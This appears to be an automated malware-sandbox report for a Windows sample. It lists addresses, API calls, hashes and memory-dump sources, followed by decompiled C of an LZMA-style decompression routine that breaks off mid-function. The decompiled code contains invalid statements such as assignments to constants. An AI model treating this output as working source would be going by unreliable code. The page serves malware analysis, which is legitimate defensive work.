                                                                                                                              0x709b1b36
                                                                                                                              0x709b1b39
                                                                                                                              0x00000000
                                                                                                                              0x709b1b39
                                                                                                                              0x709b1b29
                                                                                                                              0x709b1b10
                                                                                                                              0x00000000
                                                                                                                              0x709b1b16
                                                                                                                              0x709b1b16
                                                                                                                              0x709b1b1d
                                                                                                                              0x00000000
                                                                                                                              0x709b1b1d
                                                                                                                              0x709b1b10
                                                                                                                              0x709b1d09
                                                                                                                              0x709b1d0e
                                                                                                                              0x709b1d13
                                                                                                                              0x709b1d17
                                                                                                                              0x709b21c6
                                                                                                                              0x709b21cc
                                                                                                                              0x709b1d29
                                                                                                                              0x709b1d2b
                                                                                                                              0x709b1d2c
                                                                                                                              0x709b20f1
                                                                                                                              0x709b20f1
                                                                                                                              0x709b20f4
                                                                                                                              0x709b20f7
                                                                                                                              0x709b2114
                                                                                                                              0x709b211a
                                                                                                                              0x709b211c
                                                                                                                              0x709b2122
                                                                                                                              0x709b2139
                                                                                                                              0x709b2139
                                                                                                                              0x709b2139
                                                                                                                              0x709b2146
                                                                                                                              0x709b214c
                                                                                                                              0x709b214f
                                                                                                                              0x709b2155
                                                                                                                              0x709b2157
                                                                                                                              0x709b215a
                                                                                                                              0x709b215c
                                                                                                                              0x709b2163
                                                                                                                              0x709b2168
                                                                                                                              0x709b216b
                                                                                                                              0x709b216d
                                                                                                                              0x709b2172
                                                                                                                              0x709b2184
                                                                                                                              0x709b2184
                                                                                                                              0x709b2172
                                                                                                                              0x709b216b
                                                                                                                              0x709b215a
                                                                                                                              0x709b218a
                                                                                                                              0x709b218d
                                                                                                                              0x709b2197
                                                                                                                              0x709b219f
                                                                                                                              0x709b21ab
                                                                                                                              0x709b21b1
                                                                                                                              0x709b21b4
                                                                                                                              0x709b20e6
                                                                                                                              0x709b20e6
                                                                                                                              0x00000000
                                                                                                                              0x709b20e6
                                                                                                                              0x709b21ba
                                                                                                                              0x709b21c0
                                                                                                                              0x709b21c0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b21c2
                                                                                                                              0x709b21c2
                                                                                                                              0x709b21c2
                                                                                                                              0x709b21c2
                                                                                                                              0x00000000
                                                                                                                              0x709b218f
                                                                                                                              0x709b218f
                                                                                                                              0x709b2195
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b2195
                                                                                                                              0x709b218d
                                                                                                                              0x709b2125
                                                                                                                              0x709b212b
                                                                                                                              0x709b212d
                                                                                                                              0x709b2133
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b2133
                                                                                                                              0x709b20f9
                                                                                                                              0x709b2100
                                                                                                                              0x709b2106
                                                                                                                              0x709b210c
                                                                                                                              0x00000000
                                                                                                                              0x709b210c
                                                                                                                              0x709b1d32
                                                                                                                              0x709b1d33
                                                                                                                              0x709b20d0
                                                                                                                              0x709b20d0
                                                                                                                              0x709b20d6
                                                                                                                              0x709b20d9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b20e0
                                                                                                                              0x709b20e5
                                                                                                                              0x00000000
                                                                                                                              0x709b20e5
                                                                                                                              0x709b1d3a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b1d40
                                                                                                                              0x709b1d40
                                                                                                                              0x709b1d49
                                                                                                                              0x709b1d4e
                                                                                                                              0x709b1d54
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b1d5a
                                                                                                                              0x709b1d67
                                                                                                                              0x709b1d6d
                                                                                                                              0x709b1d77
                                                                                                                              0x709b1d7d
                                                                                                                              0x709b1d85
                                                                                                                              0x709b1d95
                                                                                                                              0x00000000
                                                                                                                              0x709b1d95

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 709B1215: GlobalAlloc.KERNELBASE(00000040,709B1233,?,709B12CF,-709B404B,709B11AB,-000000A0), ref: 709B121D
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 709B1BC4
                                                                                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 709B1C0C
                                                                                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 709B1C16
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B1C29
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B1D09
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B1D0E
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B1D13
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B1EFA
                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 709B2098
                                                                                                                              • GetModuleHandleA.KERNEL32(00000008), ref: 709B2114
                                                                                                                              • LoadLibraryA.KERNEL32(00000008), ref: 709B2125
                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 709B217E
                                                                                                                              • lstrlenA.KERNEL32(00000408), ref: 709B2198
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 245916457-0
                                                                                                                              • Opcode ID: 5c98840b8fd372984411480d4c86904076ae8cf4101cead7e901360097d524f0
                                                                                                                              • Instruction ID: 27cdcb66b3a10f0b6848d91bcd0a46296c4d1609d2206bd6b4bb95216eb91b02
                                                                                                                              • Opcode Fuzzy Hash: 5c98840b8fd372984411480d4c86904076ae8cf4101cead7e901360097d524f0
                                                                                                                              • Instruction Fuzzy Hash: DD228C7190424ADFCB11DFA4C8807EEBBFAFB05325FA0852ED196A6280D77C5981DB53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
